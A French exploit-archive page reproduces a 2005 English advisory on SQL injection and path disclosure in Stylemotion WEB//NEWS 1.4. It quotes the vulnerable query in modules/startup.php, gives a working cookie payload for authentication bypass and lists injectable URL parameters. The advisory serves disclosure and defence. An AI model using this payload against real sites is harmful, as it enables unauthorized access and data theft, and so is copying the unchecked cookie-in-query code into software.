|
Voici la 187e page demandée aujourd'hui.
|
 |
|||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
 | |||||||
|
|
|||||||
|
| |||||||
|
|
|
Exploits et Vulnérabilités logiciel sur ground418
|
||||||||||||||||||||||||||||||
|
Texte original (anglais) : [NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 ============================================================================= Software: WEB//NEWS 1.4 Type: SQL Injections, Path Disclosure Risk: High Date: Sep. 1 2005 Vendor: Stylemotion Credit: ======= Robin 'onkel_fisch' Verton http://www.it-security23.net Description: ============ WEB//News is a Newsscript which features like an CMS Vulnerability: ============== In the modules/startup.php $_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid) WHERE ( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' ) LIMIT 1"); As we can see, the $_COOKIE paramter is not checked. Below i've added how you have to set the Cookies to take advantage of these vulnerability (send this to index.php): wn_userid=1; wn_userpw=0' OR '1'='1 Path Disclosure: No file in he /actions dir is testet if it is directly included. Example: /actions/cat.add.php?name=A Nearly every REQUEST variable is not checked so there are a few of SQL-Injections availiable A few Examples: /include_this/news.php?cat=[SQL] /include_this/news.php?id=[SQL] /print.php?id=[SQL] /include_this/news.php?stof=[SQL] Greets: ============== Whole NewAngel Team, CyberDead, Modhacker, deluxe | ||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||
| partenaires | |
|
| |
|
| |